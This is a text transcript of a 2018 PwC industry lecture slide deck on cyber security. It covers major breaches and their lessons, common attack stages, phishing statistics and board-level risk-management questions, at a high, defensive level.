cyber security thursday 19th april 2018 · the majority of attacks target poor security behaviours...
TRANSCRIPT
Industry Insight Lecture
Cyber Security
Thursday 19th April 2018
PwC Slide 2
In the next 60 minutes…
Outside of this room Inside this room
• 5 FTSE 250 organisations will suffer a cyber attack
• 4,000 hours of video will have been uploaded to YouTube
• 7,200 more people will have joined LinkedIn
• Several people will have used social media ill-advisedly and damaged themselves or their employers’ reputation;
• Several thousand devices will connect to the internet for the first time; by 2020 it is estimated that there will be over 20 billion devices connected to the internet
We’ll discuss:
1. A bit about me
2. Global Cyber Security Context
3. High Profile Cyber Security Breaches – and what we can learn
4. Typical cyber-attacks, emerging threats and Cyber-enabled payment fraud
5. Mitigating the Threats and Risks in cyberspace – Questions for us to ask ourselves
6. Q&A
PwC
Your Speaker
3
PwC
Paul Brady - PwC
Paul is a Director in PwC and leads PwC’s growing cyber security and data privacy practice in the North of England.
Paul’s background is in software development; coding for British Airways on-line initiatives in the late 1990s. Paul moved into public sector IT in 2001; working in Health Informatics for 2 years before spending 4 years implementing multi-agency information sharing solutions for public sector bodies in the North-East.
Paul moved to PwC in 2008. Whilst managing Security and Controls on DWP’s Central Payment System; one of the world’s largest implementations of Oracle eBusiness Suite, processing benefits and pensions payments in excess of £120bn per annum; Paul became a member of the CESG Listed Advisor Scheme (CLAS consultant). This meant he was authorised to provide advice to critical national infrastructure providers and public sector bodies on protectively marked information up to and including SECRET.
Paul is a full Member of the Institute of Information Security Professionals (M.Inst.ISP) and his team works with organisations across all sectors on cyber threat and vulnerability management, data privacy and GDPR (general data protection regulation).
Paul will be leading a discussion on insights and lessons learned from some high profile data security breaches and cyber security incidents, using real world experience where he can (subject to client confidentiality constraints) and shining a professional light on some of the breaches that are in the public domain.
PwC
Context
5
PwC
Cyber Security Context - The world has changed…
We operate in a world where we don’t own the systems we use or control the data we rely on
Digital Revolution
Growing Cyber Risk
More Regulation
Cloud “IoTs” Big DataDigital Currency
EvolvingThreats
MoreConnections
TalentShortage
ArmsRace
6
20th CEO Survey
1,379interviews completed
2,900Global PwC CEO panel
members
79countries
PwC
Impacts of Cyber Crime
8
Investigation & Remediation
£ms in 3rd party specialist fees. Maersk costs estimated at $300m+
Regulatory Sanction4% of global revenue for GDPR breaches
Customer and Business Redress
$190 average cost per record(incl. lost business and reputational damage)
Direct Costs Intangible Costs
Increased Cyber Insurance Premium
3x increase for hacked organisations
Customer FraudTesco Paid out £2.5m to customers after
cyber fraud losses
Class Action Law Suit47k staff sue Sony for stolen data with
estimated pay outs of over $8m
Indirect Costs
Damage to BrandHarder to attract new customers
Heads RollEquifax CEO and CIO lose their jobs
Merger Value$350 million reduction in Yahoo
takeover price by Verizon
PwC
What can we learn from high profile cyber security incidents and cyber-enabled fraud?
9
PwC
Threat actor sophistication
Threat actormotivation
Accidental
Malware non-targeted
Cyber Terrorist
Organised Cyber
Criminal
State-Sponsored
Attacks
Competitor
Disgruntled ex-Employee
3rd Party Provider
Hacker Hobbyist
Hacktivist
DisgruntledCustomer
110 million credit card details stolen(November 2013)
Lulzsec & Anonymous targeted hacktivists (2012-2013)
£2.3m FSA fine for data loss
(August 2010)
Edward Snowden discloses NSA and GCHQ spying
programmes (June 2013)
$101m stolen through fraudulent payment instructions sent via
SWIFT(February 2016)
500m account details stolen from company database
(September 2016)
Widespread DDoS attack on upstream DNS provider
(October 2016)
High Profile Cyber Security Incidents
$100m stolen through targeted phishing attacks
(March 2017)
Panama Papers –11.5m leaked documents
(April 2016)
Insider
WannaCry Ransomware
(May 2017)
Cyber-thieves stole £2.5m from 9,000
people
PwC
Threat Landscape – A lot has happened in the last 18 months…
NSA leaks have accelerated the ‘democratisation of threats.’
2017
May 2017
WannaCry ransomware disrupts
74 countries and major organisations
WannaCry
June 2017
NOTPetya ransomware takes multiple systems
offline
Petya
July 2016
Internal breach affecting over
500,000 people
Shadow brokers release stolen
NSA tools to the world*
Sept 2017
143m customer details (potentially) stolen, wiped 1/3 off the value of the org.
Sept 2017
SEC admits breach in 2016 probably led to
insider trading
Aug 2017
Over 2.4 million customers potentially infected with malware
via the popular tool
cleaner
Aug 2016
The release of the NSA tools by shadow brokers has put “Nation State” tools in the hands of cyber criminals and organised crime. This has resulted in a major shift in the threat landscape for everyone.
Major impacts (+ direct costs) include…
• Maersk not being able to dock ships and unload cargo ($275m+)
• Millions of Fedex (TNT) packages were delayed ($300m+)
• A global shortage of critical drugs produced by Merck ($300m+)
*
PwC
What lessons can we learn from some of the incidents we’ve seen?
12
• Define what ‘suspicious or abnormal’ looks like; monitor transactions / anomalies; align counter-fraud and security operations;• Improve authentication / risk-based authentication, multi-factor authentication;• Educate customers on good practice, especially around usernames & passwords and phishing; have a social media strategy that goes
alongside security strategy – e.g. to coincide with containment or ‘pulling the plug’• Deploy extra protection – e.g. 3D Secure technology - such as the Verified by Visa, MasterCard SecureCode etc., Captcha to defend
against ‘bots’
Tesco Bank
November 2016Customers lost £2.5m (apparently)
• Scan for and address known vulnerabilities (web developers to harden code against common attacks); apply patches/fixes;• Complete due diligence in relation to acquisitions;• Implement detective and monitoring controls – focus on confidentiality and integrity of data and not just availability;• Falling prey to amateur hackers invites strong regulatory action;• Prevention is cheaper than cure; £42m estimated cost of remediation
Talk Talk
15 and 21 October 2015Data Theft - 157,000 individuals
• Don’t assume you are not a target and Don’t assume you won’t be collateral damage in an attack targeting another organisation. E.g. Chinese ‘APT’ (Advanced Persistent Threat) pointed DDoS botnet at the wrong infrastructure / IP address range – an organisation with no real DDoS mitigation;
• Don’t believe the Hackers – social media has been used to propagate falsehoods; following a DDoS attack that took down an internet banking ‘app’ to create an availability issue for a bank the hacktivists then falsely claimed to have taken data;
• Plan to adapt security to the potential impacts of market facing activity; increase threat and attack monitoring during/aftermarketing campaigns that raise the organisational profile or increase digital footprint / attack surface.
• Financial Services Institution 1, Accidental DDoS, 2014
• Financial Services Institution 2, Hacktivist Disinformation
• Financial Services Institution 3, Attacks following profile raising activity
Both the WannaCry Ransomware that caused disruption and delays in delivery of patient care in the NHS in the UK and the confidentiality breach involving 11.5m documents being leaked from the law firm Mossack Fonseca (‘Panama Papers’) had the same two root causes; in terms of how devastating and effective the attacks were in exploiting the root cause vulnerabilities;• Out of date vulnerable technology / software (not patched or upgraded to a more secure version); and• A flat or ‘global, flat’ network infrastructure; so the malware could fairly easily traverse the entire network and reach multiple
computers in the network once one computer had been compromised;The lesson? Update and patch systems and have a containment or network segmentation strategy; also have a pre-agreed approach todealing with RansomWare; and have a sensible timeframe for back-ups of data…
NHS – WannaCry RansomWare, May 2017
Mossack Fonseca – Panama Papers , April 2016
PwC
Recurring Themes found Post-Incident
13
Awareness Data LegacyGovernance
• Phishing continues to be a successful strategy for attackers who rely on poor staff awareness combined with gaps in an organisation’s patching or currency
• In particular, we continue to see increasing use of crypto-malware
• Users are often the last line of defence and it is important to put in place strong education and awareness programmes.
• Tendency for data to be copied and shared increases the ‘threat surface’.
• Production data is being used in non-production environments where security controls are often less stringent.
• Organisations need to understand where they store sensitive customer, commercial and staff data and ensure that it is handled appropriately and protected.
• While organisations often focus on deploying secure systems, we find a ‘blind spot’ when it comes to securing legacy estates.
• Often legacy systems are built on insecure platforms or have been re-purposed in a way that exposes business systems.
• Decommissioning of old systems is often not verified, leaving sensitive data exposed.
• A lack of accountability for cyber security risks – senior executives and board members suggesting that it is solely an IT problem.
• Lack of effective governance over security risks.
• Identification and management of risks / critical assets is often fragmented and inconsistent.
• ‘Defence in depth’ is often thought of as ‘expense in depth’.
• In reality, many of the commodity threats can be mitigated by getting the basics right.
Culture
PwC
Emerging cyber threats
Supply chains
1 2 3 4 5
Malware-free intrusions are becoming common, where VBS, PowerShell, psexec etc. are used instead.
Legitimate tools
Memory-only
malware
Exfil via legit services
Targeted e-crime
Social engineering
Increasing use of malware which rarely touches disk, negating many detection techniques in enterprise networks.
Rapid increase in data exfil via DropBox, CloudMe, MyDrive, Gmail drafts, or via compromised VPN access.
Payment teams in organisations are being heavily targeted and require specific protection and training.
Increasing online or phone interaction between attackers and victims – significant reconnaissance involved.
Strategic web compromises
Spear phishing
14
PwC
Cyber-enabled Payment Fraud
15
PwC16
What does a typical cyber attack look like?The majority of attacks target poor security behaviours by individuals to gain access.
Reconnaissance Infiltrate Execute & Cover tracks
www
Embed & Orientate
>_ DLL
Days-Months Hours-Days Weeks-Months Hours-Days
Attacker gathers intelligence on thetarget organisation and it‘s customers to refine their attack and increase their chances of success.
• Social media analysis• Digital footprinting• Network scanning
Attacker tricks a user into executing malicious software to compromise their machine or gain unauthorised access to the network.
• Targeted phishing emails• Social engineering
Attacker gains more access and installs tools to monitor systems and business processes, increasing the potential impact or financial rewards for their attack.
• Privilege escalation• Network traversal• Passive monitoring
Attacker quickly executes the attack and then removes evidence in order to stop the target identifying the attacker and preventing future attacks.
• Data extraction• Financial fraud• Denial of Service (DoS)
Sta
ge
Tim
eT
ac
tic
/Te
ch
niq
ue
By understanding what real attacks look like we can see that traditional vulnerability and penetration tests do not exercise all of an organisation’s controls. Red Team exercises go beyond technology and look at security behaviours, detective controls and response capability to provide a more rounded and context rich view of your security.
PwC 17
Business email compromise and ransomware emerge as growing business impacts, while phishing is the top vector.
Question 22: “How was your organization impacted by the security incidents?”Question 19: “How did the security incident(s) occur?”
PwC Global State of Information Security Survey
https://www.pwc.com/us/en/cybersecurity/information-security-survey.html
Business impacts of security incidents
Respondents cite business email compromise as the leading impact of incidents, while phishing becomes the top vector of cybersecurity incidents.
Are investing in a security strategy
for the Internet of Things
38%
Cite phishing attacks, making it the No. 1
attack vector for cybersecurity
incidents this year
Ransomwareimplanted on systems
Theft of "hard"intellectual property
Financial losses Theft of "soft"intellectual property
Business emailcompromise
17%
22%23%
26%
23%
Business Email Compromise (Phishing and Spear Phishing)
PwC
33% 25%
4%
33% of targets click on malicious phishing links
25% of spear-phishing targets become infected
with malware
4%: The lowest response rate to a PwC mass phishing
campaign
56%
56%: The highest response rate to a PwC mass phishing
campaign
Stopping all clicks is an impossible task
Business Email Compromise (Phishing and Spear Phishing)
PwC
Third-party business partners are still the No. 1 source of security incidents.
Question 21: “Estimated likely source of incidents” (Not all factors shown.)
PwC Global State of Information Security Survey
https://www.pwc.com/us/en/cybersecurity/information-security-survey.html
Estimated likely source of incidents
Incidents attributed to insiders, including trusted third parties and employees, declined while those ascribed to outsiders inched up.*
Third-party businesspartners
Current employees Former employees Unknown hackers Competitors
2015 201644%
34%
21%23%
41%
29%
23%26%
29% 28%
Of incidents areattributed to third-party
business partners
41%Trusted third parties include suppliers, business partners, and current and former suppliers, consultants and contractors
Source of incidents
PwC
Mitigating the Threats and Risks in cyberspace –Questions to ask ourselves
20
PwC
Understanding and Managing the Risks….
21
Key Risk Threat Actor Method of Attack
Questions to ask
• Do we have the right skills (board, business leaders, digital innovators, CISO, functional leaders…)
• Are we seeing the sorts of actions we should expect from management?
• How do we know whether these are sufficiently complete?
• Are the actions progressing fast enough?
• How do we know where we are on the journey?
Reputational DamageLoss of stored commercially sensitive information such as personally identifiable information, key company information or corporate IP.
Financial LossLoss of client assets due to compromise of payment feeds or information feeds used to perform financial trades and activity.
Disruption of Digital SystemsLoss of data (files stores / databases) and/or communication channels such as email and data feed services provided to clients.
Loss of Competitive AdvantageLeakage and exposure of sensitive information pertaining to strategy of the business i.e. merger and acquisitions.
External Network CompromiseHack into poorly configured external network devices to gain entry to the IT network.
Malware / Social EngineeringTarget staff to gain access to their desktop as an initial foothold onto the IT network.
Internal Network AccessExploit weak security controls to gain access to internal IT network and servers.
Nation State
• Economic, political, and/or military advantage
Hacktivists
• Political and social change• Influence corporate
policies
Denial of ServiceDeny access to internet based services by flooding or disrupting online traffic.
Organized Crime
• Immediate financial gain• Collect information for
future financial gains
Unauthorised Access to Client SystemsIndirect compromise and theft of client critical and sensitive information without permission.
Insider
• Deliberate sabotage of immediate employer
• Immediate and future financial gains
PwC
Threat Trend – Are we getting any better?
22
99.9% of the
exploited vulnerabilities (in 2014) had been identified for more than a year, some of them as far back as 1999.
(Source: Verizon DBIR 2015)
PwC
Threat Trend – Reading the Crystal Ball…
23
PwC
Managing cyber risk is a multi-faceted challenge…
24
Authenticating People• Password retirement
• Biometrics – done right
• Who are ‘my people’
• Strong federated authentication
• ‘Continuous authentication’
Validating Inputs• Automated processes ‘Corrupt
process by corrupting inputs’
• Authenticating systems
• Validating critical inputs Protecting Data• Securing data is no longer synonymous with securing system
• Data-centric approach to encryption
• Encryption everywhere
Fixing the Hard Basics• IT Architecture (Active Directory,
Network Segmentation, Virtualisation, Internet First)
• Automated controls (e.g. patching)
• Access Governance
• Data Architecture
• Legacy
Anomaly Detection• Holistic monitoring of people, process,
technology and physical
• ‘Risk scoring’ interactions
• Focus on ‘verifying good’
• Automated responses
Culture• Embedding cyber security in every
decision
• Empowering every individual to secure the organisation
Resilient Business• Processes that can continue when critical
IT fails
• Processes that can recover quickly from technology failure
• Minimising single points of failure
• ‘Worst case’ recovery capability
Untrusted Apps• Proliferation of apps
• Lack of control over development environment
• Isolating impact of malignant apps
• Automated compliance
Third Party Oversight• Third party attestations and audits no
longer good enough
• Operational oversight
• Real time visibility of vulnerability and threats through supply chain
Focus on managing risk to business processes, not securing kit.
Moving away from the core.
Different approach to controls.
Quantifying Risk.
Impactful Board Governance.
Clear understanding ofthreat and exposure.
PwC
A Check List for your Organisation
25
Holistic framework and approach2
Appropriate capability and resource3
Submit to independent review and test4
Incident preparedness and a track record
5
Active community contribution6
Considered approach to legal and regulatory environments7
A real understanding of exposure1
Enabling Boards to challenge themselves as to whether their response is adequate and evolving sufficiently rapidly as the risk develops.
https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/governing-cyber-security-risk.html
PwC
Questions
26
www.pwc.co.uk/cyber
This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this
publication without obtaining specific professional advice. No representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this
publication, and, to the extent permitted by law, PricewaterhouseCoopers LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for
any consequences of you or anyone else acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.
© 2018 PricewaterhouseCoopers LLP. All rights reserved. In this document, “PwC” refers to the UK member firm, and may sometimes refer to the PwC network. Each member firm is a
separate legal entity. Please see www.pwc.com/structure for further details.
150914-130053-LP-OS